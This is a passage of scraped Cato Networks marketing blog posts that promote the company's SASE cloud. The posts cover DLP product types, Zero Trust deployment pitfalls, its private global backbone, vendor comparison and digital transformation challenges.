EDLPs typically offer better coverage and enhanced protection, however, the complexity and cost concerns drive security leaders to shy away and look for simpler and cheaper options. An IDLP offers this, but the limited coverage and disjointed consoles and policy management impact their effectiveness and level of protection. CSP-Native DLPs are also simpler to onboard but are cumbersome for multi-cloud deployments and do not cover the critical use-case of unsanctioned applications (AKA Shadow IT).
All the above DLP types come with compromises. Ideally, we would want a solution that is easy to deploy and manage, has complete coverage and optimal protection, does not impact performance, and covers unsanctioned applications.
The rise of SASE DLP
A true Secure Access Service Edge (SASE), or its Secure Service Edge (SSE) subset, offers the best of all worlds. Cato's SASE Cloud, for example, covers all fundamental SASE requirements:
All edges - Cato SASE Cloud covers all enterprise users, on-prem or remote, and all applications and services, on-prem, IaaS and SaaS. This means that Cato's SASE-based DLP will have complete coverage of all traffic and all use-cases.
Single pass processing - Cato SASE Cloud utilizes Cato's proprietary Singe-Pass Cloud Engine (SPACE), which is based on a modular software platform stack that executes the networking and network security services in parallel. This enables a shared context, enhancing overall protection, and minimizes latency. Adding DLP to a Cato deployment is done by a flip of a switch and requires no additional deployment.
Cloud-native - Cato DLP is delivered fully from the cloud and offers all the benefits of a cloud-native solution, including unlimited scalability and inherent high-availability. Since it is part of the Cato SASE Cloud, it is completely CSP-agnostic and supports all leading cloud service providers, making it a true multi-cloud solution.
Converged - Cato SASE runs and manages all services as a single solution, enabling configuration, management, and visibility from a single-pane-of-glass management console.
Figure 5: SASE/SSE DLP
The pros and cons of the different DLP solution types:
Figure 6: DLP types, pros and cons
The DLP that's in your reach
A true SASE solution enables enterprises to adopt a DLP solution that benefits from all the advantages mentioned above, and more. The reduced complexity and costs, lower the traditional barrier of adoption, enabling enterprises of all sizes and levels of expertise to better protect their data. It also eliminates the dilemma of what to compromise on when looking to adopt DLP within your environment. A SASE DLP requires no compromises. Protecting your enterprise's most valuable asset is just a flip of a switch away.
To learn more about Cato DLP, read our DLP whitepaper.
1 Harvard Business Review2 DLP market guide 2021 - Gartner
The Role of the CISO Post-Pandemic The world has evolved… Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that...
A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments The Role of the CISO Post-Pandemic
The world has evolved... Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that would be achieved gradually over time. However, Covid turned this completely on its ear, forcing most organizations to accelerate that journey from 2-3 years down to 2-3 months, and doing so without a well-thought-out strategy. Couple this with the rapid rise of Work-From-Anywhere (WFA) and CISOs have realized their traditional security architectures, specifically VPNs, are no longer adequate to ensure only authorized users have access to critical resources.
Collectively, this has made the role of CISO ever more important because, as a result of this accelerated journey, we now have applications everywhere, people everywhere, leading to increased cyber threats everywhere. The role of CISO has one core imperative: mapping out the company’s security priorities and strategy, then executing this flawlessly to ensure the strongest possible security posture to protect access to critical data.
Zero Trust Is Just a Starting Point
This is why Zero Trust has now become top-of-mind for all CISOs. The concept of Zero Trust has been around for more than a decade since first being introduced. Zero Trust mandates that all edges, internal or external, cloud, branch or data center, to be authenticated, authorized and validated before granting or maintaining access to critical data. In short, Zero Trust is a framework for building holistic security for the modern digital infrastructure and associated data. Considering cyber threats continue to rapidly expand, and chasing down data breeches have become a daily activity, Zero Trust is uniquely equipped to address the modern digital business architecture: WFA workers, supply chains, hybrid cloud, and evolving threats.
It must be noted that Zero Trust is not a single product solution, and CISOs would be well advised to consult the three main standards (Forrester ZTX, Gartner Carta, NIST SP-800-207) as guidance for developing their Zero Trust strategy. Of the three, to date, NIST SP-800-207 as pictured below, is the most widely adopted framework.
Figure 1.
In general, the NIST model is a discussion of 2 key functions:
Data plane – this is the collector of data from numerous sources. These sources can be application data, user device information, user identity information, etc. Control plane – this is the brains of the model as this is responsible for making decisions upon what is considered good, bad, or requiring further clarification.
Together, the control plane and data plane collaborate to determine whether a user should be granted access permissions at any point in time to the resource for which they are requesting. Critical for this to be viable, effective, and scalable, is the context that informs decisions to be made around access and security. As each business varies in its data flows and security concerns, this context consists of data feeds, as depicted in figure 1, that includes compliance data, log data, threat intelligence feeds and user and application data, as well as other data sources captured across the network. The more context you have, the better decisions your Zero Trust deployment will make.
The 5 Most Common Pitfalls in Zero Trust Projects
The concept of Zero Trust is often misunderstood, potentially resulting in misaligned strategies that don’t meet the organization’s needs. Gartner defines Zero Trust as a ‘mindset that defines key security objectives’ while removing implicit trust in IT architectures. This implies that today’s CISOs would be well-advised to pursue their Zero Trust strategy thoughtfully, to ensure they avoid common pitfalls that impede most security initiatives.
Pitfall 1: Failing to Apply the Key Tenants of Zero Trust
Zero Trust came to life as a resolution for overly permissive access rights that created broad security risks throughout networks. The concept of implicit deny is perceived as the catch all terminology for a better security architecture, assuming it to be the fix-all for all things security. Considering this, it may be easy for CISOs to inadvertently disregard the core purpose of Zero Trust and overlook some key architectural tenants that influence Zero Trust architectures.
While each of the Zero Trust frameworks call out a number of architectural attributes of Zero Trust, for the purpose of this section, we will highlight a few that we feel should not be overlooked.
Dynamic policy determines access to resources – dynamic polices focus on the behavioral characteristics of both the user and devices when determining whether access will be granted or denied. A subset of these characteristics can include location, device posture, data analytics and usage patterns. For example, is the user in a restricted location, or are user and device credentials being used correctly? Any of these should determine whether access should be granted and at what level.
Continuous monitoring and evaluation – no user or device should blindly be trusted for access to network or application resources. Zero Trust dictates that the state of both the resource and the entity requesting access to be continually monitored and evaluated. Those deemed to be risky should be treated accordingly, whether it is limited access or no access.
Segmentation & Least Privileges – Zero Trust should eliminate blind trust and by extension, blanket access to targeted resources from all employees, contractors, supply chain partners, etc. and from all locations. And when access is granted, only the minimal amount of access required to ensure productivity should be granted. This ensures the damage is limited should there be a breach of some kind.
Context Automation – For Zero Trust to deliver the desired impact, organizations need to collect lot of data and contextualize this. This context is the key as without context, well-informed decisions for user or device access cannot be made. The more context, the better the decisions being made.
Cato SASE Cloud Approach: The Cato SASE Cloud takes a risk-based approach to Zero Trust, combining Client Connectivity & Device Posture capabilities with more holistic threat preventions techniques. Because we have full visibility of all data flows across the network, we utilize this, as well as threat intelligence feeds and user and device behavioral attributes to pre-assess all users and devices prior granting access onto the network. This in-depth level of context allows us to determine their client connectivity criteria and device suitability for network access, as well as continually monitor and assess both the user and device throughout their life on the network. Additionally, we use AI & Machine Learning algorithms to continually mine the network for indications of malware or other advanced threats and will proactively block these threats to minimize the potential damage inflicted upon the network.
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink]
Pitfall 2: Treating Zero Trust a Like a Traditional VPN
When deploying Zero Trust, many organizations tend to rely on legacy security processes that are no longer applicable or select the shiny new toy that equates to a less viable solution. In 2021, Gartner noted that some organizations reported initially configuring their Zero Trust deployments to grant full access to all applications, which ironically, mirrored their VPN configuration. One of the intrinsic shortcomings of traditional VPNs, beyond the connectivity issue, is the challenge of least privilege user access to critical applications once a user has been authenticated to the network. Traditional VPNs cannot provide partial or specific access to selected applications or resources. So, deploying Zero Trust like their old VPN leaves us to wonder what problems they are truly solving, if any.
CISOs must remember that existing security architectures are based on the concept of implicit trust, which leads to unknown, yet ever-increasing risk to modern enterprise environments. The ultimate goal of Zero Trust is to ensure that users and their devices prove they can be trusted with access to critical resources. Hence, the ultimate goal for any CISO in creating a Zero Trust strategy is to reduce the risk posed by users and devices, and in the event of a successful breach, limit the spread and impact of the attack.
Cato SASE Cloud Approach: Cato Networks realizes that existing VPN architectures are too inadequate to provide the depth of access protections for critical enterprise resources. The Cato approach to Zero Trust invokes consistent policy enforcement everywhere to ensures least privilege access to all enterprise & cloud resources, while also taking a holistic approach to preventing cyber threats. We consume terabytes of data across our entire SASE Cloud backbone, and this informs how we apply additional protections once users and devices are on the network.
Pitfall 3: Not understanding the true impact on the user, IT and Security
Unfortunately for many CISOs, IT and Security departments do not always operate with aligned priorities and desired outcomes. IT departments may have critical projects they deem to have a higher priority than Security. Security teams, being tasked with strengthening the organization’s security posture may view Zero Trust as the only priority. In such cases of mis-aligned priorities, Zero Trust efforts may result in incomplete or mis-configured deployments, expanding security gaps and increasing blind spots. And let’s not forget the end user. When IT organizations finally makes significant changes to networks, security, or other systems, if priorities aren’t aligned, the end results will produce adverse user outcomes.
When it comes to Zero Trust, CISOs must ensure they are mapping out the journey. In doing so, IT and Security teams should establish a “Hippocratic Oath” of “first, do no harm”, similar to that of the medical community. This could make it easier to map the journey to Zero Trust where the solution is simple to deploy, easy to manage, easily scales at the speed of the business, and provides positive outcomes for all parties impacted. Critical to this is the user – Zero Trust must not impede their ability to get things done.
Cato SASE Cloud Approach: At Cato Networks, our entire approach to Zero Trust is to ensure the most holistic user experience with zero impact on productivity. Often when deploying or upgrading to new security technologies, security teams will inadvertently have policy mis-matches that result in inconsistent policy enforcement in certain segments of the network. Zero Trust, if not implemented correctly, increases the risk level for negative user experiences, which will reflect poorly upon the CISO and their teams. With the Cato SASE Cloud, Zero Trust & Client Access policies are applied once and enforced everywhere. This ensures specific and consistent policy treatment for all users and devices based upon identity and user and devices access criteria.
"The hallmark of Zero Trust is Simplicity"John Kindervag
Pitfall 4: Inadequately Scoping Common Use Cases
CISOs are so inundated with everyday security concerns that identifying all possible use cases for their Zero Trust initiative, while seemingly straight-forward, could be easily overlooked. It is easy to drill down into the core requirements of Zero Trust, approaching from a broad enterprise perspective, yet neglect smaller details that might derail their project. While there are numerous use cases and each would depend on the individual organization, this document calls out (3) use cases that, if not properly planned for, will impact all non-HQ based or non-company users.
Multi-branch facilities – It is common that today’s enterprises will comprise of a single headquarter with multiple global locations. More commonly, these global locations exist in a shared space arrangement whereby the physical network and connectivity is independent of the company. In such cases, these employees still require access to enterprise applications or other resources at the HQ or company data center. In other cases, a user may be a road warrior, using unmanaged personal devices, or be located in restricted locations. Given this, great care and consideration must be given in determining if, when and how to grant access to necessary resources while denying access or restricting actions to more sensitive resources.
Multi-cloud environments – More enterprises are utilizing multi-cloud providers to host their applications and data. There are occasions whereby the application and data source exist in different clouds. Ideally, these cloud environments should connect directly to each other to ensure the best performance.
Contractors and 3rd party partners – Contractors and 3rd party supply chain partners requiring access to your network and enterprise resources is very common these days. Often these entities will use unmanaged devices and/or connect from untrusted locations. Access can be granted on a limited basis, allowing these users and devices only to non-critical services.
CISOs must factor in these and other company specific use cases to ensure their Zero Trust project does not inadvertently alienate important non-company individuals.
Cato SASE Cloud Approach: At Cato Networks, we acknowledge that use cases are customer, industry, and sometimes, location dependent. And when Zero Trust is introduced, the risk of inadvertently neglecting one or more critical use cases is magnified. For this reason, we built our architecture to accommodate, not only the most common use cases, but also obscure and evolving use cases as well. The combination of our converged architecture, global private backbone, single policy management, and virtual cloud sockets ensure we provide customers with the most accommodating, yet most robust and complete Zero Trust platform possible.
Pitfall 5: Not having realistic ROI expectations
ROI, for many IT-related initiatives is rather difficult to measure, and many CISOs often find themselves twisted on how to demonstrate this to ensure company-wide acceptance. Three questions around ROI that are traditionally difficult to answer are:
What should we expect?
When should we expect it?
How would we know?
Like many things technology-related, CISOs are hesitant to link security investments to financial metrics. However, delaying a Zero Trust deployment can yield increased costs, or negative ROI over time that can be measured in increased data breaches, persistent security blind spots, inappropriate access to critical resources, and misuse of user and resource privileges, just to name a few.
CISOs can address these ROI concerns through a number of strategies that extend beyond simple acquisition costs and into the broader operational costs. With the right strategy and solution approach, a CISO can uncover the broader strategic benefits of Zero Trust on financial performance to realize it as an ROI-enabler.
Cato SASE Cloud Approach: It is easy to appreciate the challenge of achieving ROI from Security projects. As mentioned, CISOs like CIOs are hesitant to link security investments to financial metrics. However, with an appropriate Zero Trust strategy, organizations will assure themselves enormous savings in IT effort and vendor support. Organizations deploying a Zero Trust solution based off a converged, cloud-native, global backboned SASE Cloud like Cato can expect more efficient cost structures while achieving greater performance. By converging critical security functions, including Zero Trust, into a single software stack within the Cato SASE Cloud, organizations are able to immediately retire expensive, non-scalable, maintenance-intensive VPN equipment. This approach delivers ease of deployment and simplistic management, while drastically reducing maintenance overhead and IT support costs.
Achieving Your Organization’s Zero Trust Goals with Cato SASE Cloud
Justifying a security transformation from implicit trust to Zero Trust is becoming easier and easier. However, determining the right approach to achieving an organization’s Zero Trust goals can be daunting. It is challenging when factoring in the broad paradigm shift in how we view user and device access, as well as numerous use case considerations with unique characteristics. Zero Trust Network Access is an identity-driven default-deny approach to security that greatly improves your security posture. Even if a malicious user compromises a network asset, ZTNA can limit the potential damage. Furthermore, the Cato SASE Cloud’s security services can establish an immediate baseline of normal network behavior, which enables a more proactive approach to network security in general and threat detection in particular. With a solid baseline, malicious behavior is easier to detect, contain, and prevent.
"The Zero Trust is a security model based on the principle of maintaining strict access controls and not trusting anyone by default; a holistic approach to network security, that incorporates a number of different principles and technologies.” Ludmila Morozova-Buss
The Cato SASE Cloud was designed for the modern digital enterprise. Our cloud-native architecture converges security features such as Zero Trust Network Access (ZTNA), SWG, NGFW, IPS, CASB, and DLP, as well as networking services such as SD-WAN and WAN Optimization across a global private backbone with a 99.999% uptime SLA. As a result, Cato is the only vendor currently capable of delivering seamless ZTNA on a true SASE platform for optimized performance, security, and scalability.
Zero Trust is a small part of SASE. The Cato SASE Cloud restricts access of all edges – site, mobile users and devices, and cloud resources – in accordance with Zero Trust principles. Click here to understand more about Cato Networks’ approach to Zero Trust.
It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or...
Not All Backbones are Created Equal It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.
Regardless of why the company needs to transform its enterprise network, the challenge remains the same: How do you get secure connections with the same service level of predictability and consistency as MPLS at an Internet-like price point? This calls for a SASE service built on a global private backbone.
Why a Global SASE Service?
Even enterprises who previously thought of themselves as regional operations find they need global reach today. Why? Because users and data are everywhere. They can (and probably do) sit in homes (or cafés) far from any place an office might be situated, accessing cloud apps across the globe. Pulling traffic back to some site for security inspection and enforcement adds latency, killing the application experience. Far better is to put security inspection wherever users and data sit. This way they receive the best possible experience no matter where that executive might be sitting in the world.
Why Private?
Once inspected, moving traffic to a private datacenter or other sites across the global Internet is asking for trouble. The Internet might be fine as an access layer, but it’s just too unpredictable as a backbone. One moment a path might be direct and simple; the next your traffic could be sent for a 40-stop visit the wrong way around the globe. With a private backbone, optimized routing and engineering for zero packet loss makes latency far lower and more predictable than across the global Internet.
Why Not Private Networks from Hyperscalers?
All major public cloud providers – AWS, Azure, and GCP -- realize the benefits of global private networks and offer backbone services today. So why not rely on them? Because while a hyperscaler backbone might be able to connect SD-WAN devices, it lacks the coverage to bring security inspection close to the users across the globe. Only a fraction of the many hyperscaler PoPs can run the necessary security inspections and only a smaller fraction can act as SD-WAN on-ramps. At last check, for example, only 39 of Azure's 65 PoPs supported Azure Virtual WAN. And then there's the question of availability. The uptime SLAs offered by cloud providers are too limited, only running 99.95% uptime, while traditional telco service availability typically runs at four nines, 99.99% uptime.
[boxlink link="https://www.catonetworks.com/resources/global-backbone-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=global_backbone_demo"] Global Backbone | Watch Cato Demo [/boxlink]
Why Cato’s Global Private Backbone?
For those reasons and more, enterprises are replacing their legacy network with Cato’s global private backbone. Today, it’s the largest private SASE network spanning 70+ PoPs worldwide.
Built as a cloud-native network with a global private backbone, Cato SASE Cloud has revolutionized global connectivity. Using software, commodity hardware, and excess capacity within global carrier backbones, we provide affordable SLA-backed connectivity at global scale.
And every one of our PoPs runs the Cato Single Pass Cloud Engine (SPACE), the converged software stack that optimizes and secures all traffic according to customer policy.
Our simple edge devices combine last mile transports, such as fiber, cable, xDSL, and 4G/5G/LTE. Encrypted tunnels across these last-mile transport carry traffic to nearest PoP. The same goes for our mobile clients (and clientless access). From the PoP, traffic is routed globally to the PoP closest to the destination using tier-1 and SLA-backed global carriers.
This model extends to cloud services as well. Traffic to cloud applications or cloud data centers exit at the PoP closest to these services, and in many cases within the same data center hosting both PoP and cloud service instance.
Key Benefit #1 – Optimized Performance
With built-in WAN optimization, Cato increases data throughput by as much as 40x. Advanced TCP congestion control enables Cato edges to send and receive more data, as well as better utilize available bandwidth. Other specific optimization improvements include:
Real-time network condition tracking to optimize packet routing between PoPs. We don’t rely on inaccurate metrics like BGP hops, but rather on network latency, packet loss, and jitter in the specific route. Controlling the routing and achieving MPLS-like consistency and predictability anywhere in the world. For example, the path from Singapore to New York may work better through Frankfurt than going direct, and Cato SASE Cloud adapts to the best route in real time. Applying dynamic path selection both at the edge and at the core – creating end-to-end optimization. Accelerating bandwidth intensive operations like file upload and download through TCP window manipulation.
Key Benefit #2 – Self-Healing and Resiliency
To ensure maximum availability, Cato SASE Cloud delivers a fully self-healing architecture. Each PoP has multiple compute nodes each with multiple processing cores. Each core runs a copy of Cato SPACE, which manages all aspects of failure detection. Failover and fail back are automated, eliminating the need for dedicated planning or pre-orchestration. More specifically, resiliency capabilities include:
Automatically working around backbone providers in case of outage or degradation to ensure service availability. Ensuring that if a compute node fails, tunnels seamlessly move to another compute node in the same PoP or to another nearby PoP. And in the unlikely event that a tier-1 provider fails or degrades, PoPs automatically switch to one of the alternate tier-1 providers. Specialized support for challenging locations like China. Cato PoPs are connected by private and encrypted links through a government-approved provider to Cato's Hong Kong PoP.
A great example of Cato resiliency at work was the recent Interxion datacenter outage in London housing Cato’s London PoP. The outage disrupted trading on the London Metal Exchange for nearly five hours. And for Cato? A few seconds. Read this first-hand account from Cato’s vice president of operations, Aviram Katzenstein.
Key Benefit #3 – Secure and Protected
Cato’s global private backbone has all security services deployed in each of the Cato PoPs. This means that wherever you connect from, your traffic is protected by a full security stack at the PoP nearest to you. From there, Cato’s backbone carries your traffic directly to its destination, wherever it may be. This enables full security for all endpoints without any backhauling or additional stops along the way.
Extensive measures are taken to ensure the security of Cato SASE Cloud. All communications – between PoPs, with Cato Sockets, or Cato Clients – are secured by AES-256 encrypted tunnels. To minimize the attack surface, only authorized sites and remote users can connect and send traffic to the backbone. The external IP addresses of the PoPs are protected with specific anti-DDoS measures. Our service is ISO 27001 certified.
Key Benefit #4 – Internet-like Costs
We reduce the cost of enterprise-grade global connectivity by leveraging the massive build-out in IP capacity. All Cato PoPs are connected by SLA-backed transit capacity across multiple tier-1 networks. The Cato software monitors the underlying, capacity selecting the optimum path for every packet. The result: a network with far better performance than the public Internet at a far lower cost than global MPLS.
A Proven Solution for Global Connectivity
Cato’s backbone delivers better performance, availability, and coverage than any single carrier. A single tier-1 carrier can’t reach all parts of the globe, and a single tier-1 carrier can’t provide the predictability of MPLS. Just as enterprises use SD-WAN to aggregate Internet services and overcome the limitations of any one service, SASE leverages SD-WAN to aggregate tier-1 carriers to overcome the limitations of any one network.
“Opening new stores now goes smoothly, pricing is affordable, the cloud firewall and private backbone provide a great experience, and services are easy to set up.” Steve Waibel, Director of IT, Brake Masters
“We no longer had to have a separate IDS/IPS, on-premises firewalls, or five different tools to report on each of those services. We could bring our cloud-based services directly into Cato’s backbone with our existing sites and treat them all the same.” Joel Jacobson, Global WAN Manager, Vitesco Technologies
“The fast backbone connection most of the way to its ACD cloud service was a big plus. QOS was always a struggle before Cato. It’s pretty awesome to hit that Cato network and see that traffic prioritized all the way through to the cloud, rather than just close to our site.” Bill Wiser, Vice President of IT, Focus Services
Thanks to the low cost of the Cato solution, Boyd CAT more than doubled branch bandwidth, by moving from 10 to 25 Mbits/s - to dramatically improve application performance together with Cato's optimization and global private backbone.
“The branches were just loving it. They started fighting over who would transition to Cato next. We were able to discontinue all our MPLS connections.”Matt Bays, Communications Analyst, Boyd CAT
With Cato SASE, office and remote and home workers connect to the same high-speed backbone. Mobile and home users benefit from the same network optimizations and security inspections as office workers.
“This year, the entire WAN and Internet connectivity will be running on Cato.” Eiichi Kobasako, Chief of Integrated Systems, Lion Corporation
There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used...
Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every single vendor is inherently biased to believe that their offering is the best. So, let us take a look at what this expression means, and why we should compare apples and oranges when evaluating SASE solutions.
Why Compare Apples and Oranges
An apple and an orange have many things in common. They are both fruits, they are both round, they both can taste sweet (or sour), and both can do damage if they are thrown in anger. Based on these characteristics alone, there is no discernible difference between the two.
Now, what are the differences? The question you need to ask yourself is, “What do I want?” If you are looking to make an apple pie, then the choice is obvious. However, if your goal is to just eat something fruity, then that is where the deliberation begins. Do you buy an apple? Do you buy an orange? If you do not have an idea in mind, it is easy to get overwhelmed in the fruit aisle…
Mapping Architecture to Your End Goal
Look at the solutions and technologies that you use today within your corporate network and think about the purpose of their design. Have you purchased an orange or an apple, or do you have a chaotic digital fruit-salad which has grown organically over time due to a myriad of tastes and preferences? If so, you need to re-evaluate your entire corporate strategy to help you grow and develop into the future.
The architecture of every fruit has a purpose and has been designed in an optimal way to ensure continuity of their lineage. The orange has segments which may hold individual seeds, while grapes grow in a bunch connected by the stalks. This his could be compared to a microservice architecture, such as Docker (packing containerized applications on a single node) or Kubernetes (running containerized applications across a cluster). Each fruit has its pros, cons, and uses, however the more fruit you want, the more difficult your life becomes. You need to understand the architecture of each fruit, and then go on to identify the best-practice for fruit combinations. You need to know the purpose and intent of each piece of fruit, and you need to locate a myriad of different fruits. This is manageable if there’s only one person purchasing and eating fruit for the company, but as soon as you add another personality – the situation evolves, in a negative way, and we haven’t even thought of the fruit bowl challenge.
[boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink]
The Fruit Bowl Challenge
Every time you purchase a piece of fruit, you need to store it somewhere. This could be in the fridge, in a bowl, in a cupboard, or left in your car under the scorching sun. To purchase each piece of fruit, you may need to go to different shops, with varying levels of quality. Should you purchase a Jazz Apple or a Braeburn, a Clementine or a Satsuma? Once you’ve identified which specific type of fruit you want, where can you get it at the right price? Shop A may offer it at a lower price than Shop B today, but that’s a limited time offer. When you’re trying to maximise a constrained budget, the time investment required to ensure you purchase something of quality and longevity can be a moderately significant effort.
Now, consider each piece of fruit is a component of your network. You want to purchase edge security, so you gather several vendors to check for bruises, blemishes, and pack-size. After making your decision on what to buy (after months of deliberation, RFPs, and proof-of-concepts), you then move to the negotiation stage with hundreds of distributors, resellers, or VARs. Finally, you close on the deal, and they send you a truck full of apples. It’s what you wanted right? I hope you have somewhere to store all those apples, because the clock is ticking, and they’re already starting to spoil.
Turning Apples into Apple Pie
So, you have your apples, you can see them, and you proudly gaze upon the mountain of fruit sat in your warehouse. You’ve spent a lot of money on these apples, and you’ve cashed in all your favours with your CFO to get the budget approved for this gargantuan upfront cost. Now the real work begins, as you need to prepare for the implementation, deployment, and creation of your apple pies (or firewall/site deployments, I’m sticking to the metaphor here!)
The first thing you do is hire a group of people to move the apples into neat piles. Then you hire another group of people to come and peel the apples, as well as a disposal company to remove the packaging/peel that you no longer need. Once fully peeled and sliced, you then need a way to transport the prepared goods to the next location for processing – all of this is required even before your apples touch pastry. However, you accounted for this during your initial budget spend, and do not see it as a concern, until you notice that some of the fruit has already turned rotten. You need to contact the vendor to initiate a return (RMA), and this is where you notice problems.
The Rotten Apple Problem
“Your support contract on this apple has expired.”
I personally used to work for an appliance (fruit) based company, and I had to tell customers this on an almost daily basis. People call Support for assistance as their sites may be down, or critical applications have been impacted by service outages and they need urgent P1 Support. However, if the customer had not actively maintained their Support contracts, then there is no legal obligation to assist resolve their problem. In fact, if the vendor operates on a ‘Support & Maintenance per device’ basis, it’s within their interest to actively withhold assistance until you pay the money to reinstate the contract.
How many apples did you just buy? Did you take a Support contract out on every apple? Are you actively tracking the start and end-date of the renewal? Have you invested in administrative staff to ensure you have consistency of care? Will this vendor assist you with bruised apples, or does your contract only cover total losses? These are questions you should be asking yourself as you review the entire total cost of ownership for every single purchased asset. If you’ve amortized an apple over a 5-year period, do you think you’ll still be wanting the same apple 5 years from now? Your taste may have changed.
Oh, and did you remember, currently you haven’t just purchased apples for your company. Life isn’t that simple. You’ve also purchased your grapes, peaches, plums, pears, bananas and more, because you want to maintain in complete control of your network using point products. How does this make you feel having to constantly maintain this supply chain? Your life has become confusing, and this all started because somebody originally said that you were ‘comparing apples to oranges.’
The Cato Solution
We’ve been talking in metaphors during this article, but let’s drop the pretence and start talking directly. Today your network is most likely built with a series of different products built by a myriad of vendors. You have network firewalls, internet gateways, CASB engines, VPN concentrators, anti-malware engines, Intrusion Prevention Systems (IPS) and many more. Each of these products have been built by their vendors in the belief that they are the best in their own functional field, however to you as a consumer of products, you have a wide portfolio of products that you must learn (as well as maintain, update, and manage.) Dealing with these administrative tasks are likely not the reason you decided to get into IT, but here you are. Life doesn’t have to be this way.
Cato Networks offers a truly converged service offering covering all aspects of Networking, Security and Access. The term ‘service offering’ is key, as we maintain, manage, and continually improve our service in the cloud, ensuring that you have the latest-and-greatest in networking and security coverage without having to lift a finger. Unlike product-based companies, you don’t have to have significant warehouse space to store hundreds of servers and appliances, you don’t need to worry about multitudes of service contracts, and best of all, you don’t need to worry about upgrading or patching (as this is done by Cato Networks.)
How to Solve the Fruit Bowl Challenge with Cato
So, in short, apples are great, and oranges are fine. But why limit yourself? What if I told you that you could have BOTH apples and oranges? What if I told you that you could get both using a single service subscription? What if I told you that we’re constantly growing our catalogue of SASE features and offerings, so you also get peaches, plums, pineapples, and pears at no extra cost? What if I told you that new fruit is being added every two weeks? Why limit yourself to just buying apples, when Cato can offer you every fruit under the sun, whenever you want it, all at the click of a button.
We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges,...
Solving Real-World Challenges – Your Pathway to SASE We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or failure.
This article provides IT and security professionals with actionable ideas for selecting a robust platform for digital transformation to address the network and security challenges that adversely impact their business.
We cover:
Real-world challenges in need of solutionsThe Cato SASE ApproachSASE ComparisonsKey questions to ask yourself when looking for a solutionMapping Your Journey
Real-world Challenges Breeds New Networking and Security Considerations
Global Business Expansion Creates New Connectivity Requirements
We are a global business society that is constantly expanding, whether organically into new markets or through mergers and acquisitions into new business lines. Whatever the impetus, there are real challenges these organizations will face. Adding new locations, for example, requires planning for global and local connectivity, which could be very inconsistent, depending upon the region.
In the case of mergers, we must deal with inconsistent or incompatible networks architectures, while factoring in the unreliable nature of global connectivity over a public internet. And let’s not forget inconsistent security policies that add to your headaches.
And finally, we must consider how all this affects migrating new users and apps onto your core network, as well as ensuring access and security policies are correct. Not impossible, but this could take weeks or months to achieve.
All this results in unexpected consequences.
Core Challenges:
Rapid site deploymentInconsistent connectivityPublic Internet Transport
On-premise to Cloud Migration Spurs Capacity Constraints
Most obstacles in cloud adoption are related to basic performance aspects, such as availability, capacity, latency and scalability. Many organizations neglect to consider bandwidth and capacity requirements of cloud applications. These applications should deliver similar or better performance as legacy on-premise. However, with the rush to adapt to the new Covid-normal, many are finding this is far from reality.
Scalability is also an issue with cloud deployments. As businesses continue to grow and expand, the greater the need for a cloud network that scales at the speed of their business, and doesn’t restrict the business with its technical limitations.
All together, these are real issues IT teams continue to face today, and until now, saw little to no relief in sight.
Core Challenges:
Capacity planning and cost managementPoor app performanceScalability
Expanding Cyber Threat Landscape
Every year, like clockwork, we witness numerous global companies attacked by cyber criminals at least once per day. Many have had sensitive data stolen and publicly leaked. The pandemic only exacerbated this, pushing more employees further from the enterprise security perimeter. The growth in Work-From-Anywhere (WFA) introduced more remote worker security challenges than many expected, and not many were truly prepared.
Additionally, as more organizations move their apps to cloud, providing security for these apps, as well as safe use of 3rd party SaaS apps, became an even stickier point for today’s enterprises. This, along with securing remote workers, is pushing IT leaders to face the harsh reality of their current cyber defense short-comings.
As these businesses attempt some form of return to normal, it’s clear we may never make it back to traditional full-time office setup. WFA, as well as increased cloud usage, is here to stay, meaning the threats to the business will only increase. This means the potential costs of cyber breaches will follow suit.
Core Challenges:
Expanding cyber threat landscapeSecuring Work-from-anywhere (WFA)Improper employee usage
The Cato SASE Approach to Rapid Digital Transformation
It’s easy for most organizations to take a traditional approach to these challenges by looking for point solutions or creative chaining of technologies to create a bundled solution. While this provides an initial “feel-good” moment, this complex approach, invariably, creates more problems than it solves.
Cato addresses these challenges through simplicity, and accomplish this through our converged, cloud-native approach. The Cato SASE (Secure Access Service Edge) Cloud converges core capabilities of networking, security and access management into a single software stack that delivers optimized cloud access, predictable performance, and unified policy management. Our SASE Cloud also provides complete visibility to inspect all traffic flows and provide advanced, holistic threat protection and consistent policy enforcement across a global private backbone.
Cato addresses the challenges of global connectivity with our global private backbone, providing resiliency and performance SLA guarantees. Our cloud acceleration and optimization address the performance challenges faced when migrating enterprise apps to a cloud data center. And we address the security challenges with advanced, holistic security tools like NGFW, SWG, NextGen Anti-Malware, IPS, CASB and DLP.
The Cato SASE Cloud enables enterprises to more rapidly and securely deliver new products and services to market, and more quickly respond to changes in business and technology dynamics that impacts their competitiveness.
What is SASE and its Core Requirements?
When deciding on SASE solutions, it is helpful to understand the core requirements as specified by Gartner and compare the various vendors in the market. For SASE to deliver on the promise of infrastructure simplicity, end-end optimization and limitless scalability, it must adhere to certain requirements: Converged, Cloud-native, Global, All Edges and Unified Management.
